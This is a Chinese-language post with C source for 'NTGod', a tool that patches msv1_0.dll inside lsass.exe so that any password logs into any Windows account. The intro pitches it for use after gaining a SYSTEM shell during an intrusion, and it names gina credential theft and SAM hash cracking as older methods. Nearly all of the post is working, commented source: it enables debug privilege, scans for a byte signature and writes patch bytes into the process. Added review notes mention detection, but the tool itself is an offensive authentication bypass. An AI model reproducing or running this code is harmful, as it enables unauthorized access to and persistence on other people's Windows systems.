//换下思路,webshell(个别变态机子)提权也可以使用,有木有?
NTGod NT上帝模式,打开上帝模式可以用任意密码登录任意windows系统帐号,从而达到不增加帐号、不破坏被入侵主机系统的情况下,登录系统帐号。
情景再现: 当你在进行主机安全检测时,获取了SYSTEM Shell,以前会想办法获得administrator等帐号的口令,使用gina窃取、sam hash破解、增加管理帐号等,而现在直接执行 ntgodmode on 就可以轻松登录任意帐号。登录完毕后,ntgodmode off,关闭上帝模式。
#include
#include
#include
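// Enables SeDebugPrivilege on the current process token.
// Returns TRUE only when the privilege was actually enabled. The original
// returned AdjustTokenPrivileges' raw result, which is TRUE even when the token
// does not hold the privilege at all (GetLastError() == ERROR_NOT_ALL_ASSIGNED),
// and it called CloseHandle on an uninitialized handle when OpenProcessToken failed.
// Note for defenders: enabling this privilege is the step that lets the later
// OpenProcess on a system process succeed; token privilege adjustments are auditable.
BOOL EnableDebugPriv(void)
{
    HANDLE hToken = NULL;
    BOOL bRet = FALSE;
    // TOKEN_QUERY is required alongside TOKEN_ADJUST_PRIVILEGES by AdjustTokenPrivileges.
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
    {
        return FALSE;
    }
    TOKEN_PRIVILEGES tkp;
    if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid))
    {
        tkp.PrivilegeCount = 1;
        tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        // A TRUE return does not mean the privilege was granted; check the last error too.
        if (AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, 0)
            && GetLastError() != ERROR_NOT_ALL_ASSIGNED)
        {
            bRet = TRUE;
        }
    }
    CloseHandle(hToken);
    return bRet;
}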
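// Returns the PID of the first running process whose image name equals pn
// (case-insensitive), or 0 when no such process exists or the snapshot fails.
// The original leaked the Toolhelp snapshot handle on every path and never
// checked whether CreateToolhelp32Snapshot succeeded.
DWORD GetTargetPid(char *pn)
{
    DWORD dwPid = 0;
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnap == INVALID_HANDLE_VALUE)
    {
        return 0;
    }
    PROCESSENTRY32 pe;
    pe.dwSize = sizeof(pe); // must be set before Process32First
    for (BOOL ok = Process32First(hSnap, &pe); ok; ok = Process32Next(hSnap, &pe))
    {
        if (lstrcmpi(pn, pe.szExeFile) == 0)
        {
            dwPid = pe.th32ProcessID;
            break;
        }
    }
    CloseHandle(hSnap);
    return dwPid;
}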
// Returns the offset, relative to the module base, of a byte pattern inside dn.
// The DLL is loaded into THIS process with LoadLibrary purely so its image can be
// scanned, and it is freed again before returning. The offset is later added to
// the module base inside the target process (see GetSinatureViraddr).
// Return: the module-relative offset of the match, or (DWORD)-1 when LoadLibrary fails.
// NOTE(review): the scan below has no upper bound. If the pattern is absent it
// walks past the end of the mapped image and faults; a memcmp loop bounded by the
// image size would be the safe form.
DWORD GetSinatureAddr(char *dn)
{
HMODULE hLib;
DWORD dwSinatureAddr;
hLib = LoadLibrary(dn);
if ( hLib )
{
// Signature check (MSVC inline asm, 32-bit only).
// [ebx] is used as the scan cursor: the first mov stores eax there, on the
// assumption that eax still holds LoadLibrary's return value (hLib) at this point.
// NOTE(review): that store goes through whatever pointer ebx held on entry, i.e.
// into caller-owned memory rather than a local — confirm this is intended.
__asm
{
push ebx
mov dword ptr [ebx], eax
xor eax, eax
// Stage 1: walk the cursor forward until the bytes 8B 4D 0C 49 are found
check_1_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], 0x8B
jnz short check_1_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], 0x4D
jnz short check_1_end
mov eax, dword ptr [ebx]
add eax, 2
cmp byte ptr [eax], 0x0C
jnz short check_1_end
mov eax, dword ptr [ebx]
add eax, 3
cmp byte ptr [eax], 0x49
je short check_2_start
check_1_end:
inc dword ptr [ebx]
jmp short check_1_start
// Stage 2: keep walking until 32 C0 is found, then save that address into dwSinatureAddr
check_2_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], 0x32
jnz short check_2_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], 0x0c0
jnz short check_2_end
mov eax, dword ptr [ebx]
push eax
lea eax, dwSinatureAddr
pop dword ptr [eax]
mov eax, dword ptr [ebx]
jmp short check__over
check_2_end:
inc dword ptr [ebx]
jmp short check_2_start
check__over:
xor eax, eax
pop ebx
}
}
else
{
// NOTE(review): this branch is reached when LoadLibrary fails, so the message
// text is misleading. -1 converts to 0xFFFFFFFF in the DWORD return type.
printf("Failt to found the Sinature offset.\n");
return -1;
}
// Convert the absolute address found in this process into a module-relative offset.
dwSinatureAddr = dwSinatureAddr - (DWORD)hLib;
//printf("%08x , %x\n", dwSinatureAddr, hLib);
FreeLibrary(hLib);
return dwSinatureAddr;
}
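// Returns the load address of module dn inside process dwTargetPid, or 0 when the
// snapshot cannot be taken or the module is not present.
// The base is truncated to a DWORD by the cast, so this only works for a 32-bit
// target and a 32-bit build of this tool.
// The original never assigned the result of Module32Next back to its loop flag,
// so it spun forever whenever dn was not in the list; it also never checked the
// snapshot handle.
DWORD GetModBase (DWORD dwTargetPid, char *dn)
{
    DWORD dwModBase = 0;
    HANDLE hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwTargetPid);
    if (hModuleSnap == INVALID_HANDLE_VALUE)
    {
        return 0;
    }
    MODULEENTRY32 lpModInfo = {0};
    lpModInfo.dwSize = sizeof(lpModInfo); // must be set before Module32First
    for (BOOL bModule = Module32First(hModuleSnap, &lpModInfo);
         bModule;
         bModule = Module32Next(hModuleSnap, &lpModInfo))
    {
        if (lstrcmpi(dn, lpModInfo.szModule) == 0)
        {
            dwModBase = (DWORD)lpModInfo.modBaseAddr;
            break;
        }
    }
    CloseHandle(hModuleSnap);
    return dwModBase;
}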
// Converts a module-relative offset into an address inside the target process
// by adding the module's base address there. Plain DWORD arithmetic, no checks.
DWORD GetSinatureViraddr(DWORD dwSinatureAddr, DWORD dwModBase)
{
    DWORD dwVirAddr = dwModBase;
    dwVirAddr += dwSinatureAddr;
    return dwVirAddr;
}
// Writes two bytes at dwSinatureVirAddr inside process dwTargetPid.
// checkbuff equal to "on" (case-insensitive) writes B0 10; any other value
// writes 32 C0, which are the same two bytes the scan in GetSinatureAddr
// matched, so "off" restores the original content.
// Detection/mitigation notes: OpenProcess(PROCESS_ALL_ACCESS) on the target
// followed by VirtualProtectEx and WriteProcessMemory is the observable sequence
// here. With LSA Protection (RunAsPPL) enabled the OpenProcess call is expected
// to fail and hProcess stays NULL, which this function never checks.
// NOTE(review): dwTargetPid is reused as the lpflOldProtect output of the first
// VirtualProtectEx, so after that call it holds the page's previous protection,
// not the PID; the second call passes that value back as the new protection.
// WriteProcessMemory's result is ignored and hProcess is never closed.
void FuckPassword (char *checkbuff, DWORD dwTargetPid, DWORD dwSinatureVirAddr)
{
HANDLE hProcess = NULL;
char buff1[] = "\xB0\x10"; // bytes written for "on"
char buff2[] = "\x32\xC0"; // bytes written for anything else ("off")
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwTargetPid);
// Make the two target bytes writable; the previous protection lands in dwTargetPid.
VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, PAGE_READWRITE, &dwTargetPid);
if ( lstrcmpi("on", checkbuff) == 0 )
{
WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff1, 2, 0);
printf("Open God Mode");
}
else
{
WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff2, 2, 0);
printf("Close God Mode");
}
// Restore the protection saved by the first call (now held in dwTargetPid).
VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, dwTargetPid, &dwTargetPid);
}
// Prints the startup banner, one line per entry.
void CopyRightInfo()
{
    static const char *const banner[] = {
        "------------------------------------------",
        "RNtGod",
        "Author: Cyg07",
        "Reverse from golds7n[LAG]'s NtGod",
        "------------------------------------------",
    };
    // puts appends the newline the original printf format strings carried.
    for (size_t i = 0; i < sizeof banner / sizeof banner[0]; i++)
    {
        puts(banner[i]);
    }
}
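// Entry point. argv[1] is passed to FuckPassword: "on" applies the patch,
// anything else restores it. Each lookup step is now checked so the tool stops
// instead of carrying a failure value (offset -1, PID 0, base 0) into the
// cross-process write; the original only checked argc.
int main(int argc, char* argv[])
{
    CopyRightInfo();
    if (argc < 2)
    {
        printf("Usage: %s On|OFF\n\n", argv[0]);
        return 0;
    }
    char *DllName = "msv1_0.dll";   // module that is scanned and patched
    char *ProcessName = "lsass.exe"; // process that hosts it
    // Offset of the pattern inside the DLL, measured on a copy loaded locally.
    DWORD dwSinatureAddr = GetSinatureAddr(DllName);
    if (dwSinatureAddr == (DWORD)-1)
    {
        printf("Failed to locate the signature offset.\n");
        return 1;
    }
    // Best effort, as in the original: a warning only, execution continues.
    if (!EnableDebugPriv())
    {
        printf("Failt to enable debug priv.\n");
    }
    DWORD dwTargetPid = GetTargetPid(ProcessName);
    if (dwTargetPid == 0)
    {
        printf("Failed to find process %s.\n", ProcessName);
        return 1;
    }
    DWORD dwModBase = GetModBase(dwTargetPid, DllName);
    if (dwModBase == 0)
    {
        printf("Failed to find %s in the target process.\n", DllName);
        return 1;
    }
    // Translate the local offset into an address inside the target process.
    DWORD dwSinatureVirAddr = GetSinatureViraddr(dwSinatureAddr, dwModBase);
    FuckPassword(argv[1], dwTargetPid, dwSinatureVirAddr);
    return 0;
}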